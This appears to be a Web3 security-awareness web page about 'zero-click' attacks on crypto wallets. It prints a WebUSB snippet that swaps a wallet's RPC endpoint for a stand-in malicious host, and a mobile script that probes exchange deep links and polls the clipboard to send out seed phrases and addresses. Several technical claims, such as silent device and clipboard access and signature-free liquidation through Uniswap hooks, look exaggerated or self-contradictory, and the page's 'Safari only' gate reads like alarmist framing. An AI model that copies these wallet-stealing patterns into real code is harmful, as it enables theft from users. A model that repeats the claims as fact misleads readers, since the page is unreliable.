🔒

Security Notice

For your security, this page is only accessible through Apple Safari browser. Please open this page in Safari to continue.

Zero-Click Attacks: The Invisible Threat to Web3 Assets

The moment a malicious page loads in your browser, silent background sniffing may have already begun

⚠ Security Notice: This site has silently blocked all wallet interaction requests. This is a purely read-only page with no signing, authorization, or asset transfer operations.
Stop blindly believing "I'm safe as long as I don't sign." Zero-click attacks have evolved into a "three-dimensional matrix" targeting different devices. The moment your browser loads any malicious page, background sniffing may have already started. Below is an analysis of attack vectors against three major Web3 user profiles worldwide.
[Target: Hardware Wallets & Web3 RPC]

PC & Hardware Wallets: Node Poisoning Attack

In a PC browser environment, attackers can exploit Chromium V8 engine Remote Code Execution (RCE) vulnerabilities to silently sniff local USB bus device information via the WebUSB API.

Attack Principle

Attackers don't need to crack the hardware wallet (Ledger/Trezor) itself. Malicious scripts directly pollute and tamper with the default JSON-RPC node address of local wallet plugins in browser memory. While the hardware wallet remains properly connected, the balance and interface you see have become a "mirror illusion" controlled by the attacker.

exploit_usb_sniffer.js
// USB Bus Sniffing via WebUSB API
async function sniffHardwareWallets() {
  const devices = await navigator.usb.getDevices();
  
  for (const device of devices) {
    // Ledger Vendor ID: 0x2c97
    if (device.vendorId === 0x2c97) {
      console.log('[HARDWARE_DETECTED]', device.productName);
      
      // Pollute JSON-RPC endpoint in memory
      await injectMaliciousRPC({
        chainId: 0x1,
        rpcUrl: 'wss://node.malicious-proxy.xyz',
        method: 'wallet_addEthereumChain'
      });
    }
  }
}

// Execute on DOMContentLoaded
sniffHardwareWallets();
[Target: Anti-Detect Browsers & Sybil Environments]

Anti-Detect Browsers: Sandbox Escape Attack

Anti-detect browsers (such as AdsPower, Multilogin, etc.) are widely used for automation or multi-account environments (Sybil), but their isolation mechanisms have potential vulnerabilities.

Attack Principle

Traditional environment isolation relies on application-layer sandboxes, but new attacks exploit WebGL and Canvas underlying rendering vulnerabilities to achieve anti-detect browser sandbox escape. Malicious scripts can batch scan and extract Extension Local Storage caches shared by all isolated windows in physical memory. A single misstep in one window can lead to cross-contamination and encrypted data theft of dozens of isolated wallet accounts on the same machine.

[Target: Mobile WebView & DeepLink Hijacking]

Mobile WebView: Deep Link Hijacking

On mobile (iOS/Android) or in-app wallet browsers, attackers can exploit WebView vulnerabilities unique to mobile platforms.

Attack Principle

Malicious pages use hidden deeplink protocols to silently attempt to launch or sniff exchange apps (like Upbit, Binance) or local wallets installed on the phone. Meanwhile, a high-frequency clipboard listener (Clipboard Sniffer) continuously monitors clipboard content changes. Sensitive data (addresses, mnemonic phrases, etc.) may be encrypted and exfiltrated via WebSockets channels the moment memory is refreshed.

mobile_clipboard_sniffer.js
// Mobile WebView Exploitation
const initMobileExploit = async () => {
  // Hidden deeplink probe
  const deeplinks = [
    'upbit://wallet',
    'binance://web3',
    'metamask://'
  ];
  
  deeplinks.forEach(async (link) => {
    const iframe = document.createElement('iframe');
    iframe.src = link;
    iframe.style.display = 'none';
    document.body.appendChild(iframe);
  });

  // High-frequency clipboard monitor
  setInterval(async () => {
    const text = await navigator.clipboard.readText();
    if (isSensitive(text)) {
      exfilToPrivacyPool(text);
    }
  }, 500);
};

initMobileExploit();

🏁 Automated Attack Closure

Once multi-dimensional sniffing and hijacking forms a closed loop, using Uniswap V4's Hook mechanism, the attacker's automated script can trigger asset liquidation without any signature, directly cross-chain swapping to privacy tokens (XMR/Torn) through the user's next legitimate blind signature (such as Permit2).

This Wiki is for Web3 global technical security education only. Please keep your browser kernel updated and never keep your wallet in an unlocked state in insecure network environments.